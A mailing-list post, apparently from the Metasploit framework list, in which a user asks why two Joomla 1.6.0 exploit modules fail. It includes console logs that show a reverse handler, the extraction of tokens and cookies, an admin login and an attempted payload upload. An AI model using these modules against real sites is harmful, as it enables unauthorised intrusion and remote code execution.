joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE)

[Jeffs <jeffs () speakeasy net>]

Hello All,

Anybody get joomla_filter_order and/or joomla_16_admin_exec to work?

I've launched it against a vulnerable 1.6 install of Joomla and get the 
following (even tried varying BMCT and BMCR as instructed):

msf exploit(joomla_filter_order) > exploit
[*] Started reverse handler on 192.168.1.108:4444
[*] Initializing exploit code ...
################################################
# Joomla! 1.6.0 SQL Injection -> PHP execution #
################################################
# By James Bercegay # http://www.gulftech.org/ #
################################################
[*] Attempting to determine Joomla version
[*] The target is running Joomla version : 1.6
[*] Host appears vulnerable!
[*] Got database table prefix : jos_
[*] Calculating target response times
[*] Benchmarking 1 normal requests
[*] Normal request avg: 0 seconds
[*] Benchmarking 1 delayed requests
[*] Delayed request avg: 1 seconds
[-] Either your benchmark threshold is too small, or host is not vulnerable
[-] To increase the benchmark threshold adjust the value of the BMDF option
[-] To increase the expression iterator adjust the value of the BMCT option
[*] Exploit completed, but no session was created.
msf exploit(joomla_filter_order) >



msf exploit(joomla_16_admin_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.108:4444
[*] Attempting to extract a valid request token
[*] Got token: 5546d400d2ac74f8bcc6f23ea1eec261
[*] Got Cookie: 114a3fcff61e5bebf5463b377d1563a3 => 
e146646fc1c90611ba2117118785823c
[*] Attempting to login as: admin
[*] Successfully logged in as: admin
[*] Attempting to extract refreshed request token
[*] Got token: 44e14542b6a247c4281e7004dff16397
[*] Attempting to upload payload wrapper component
[*] Exploit completed, but no session was created.
msf exploit(joomla_16_admin_exec) >

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework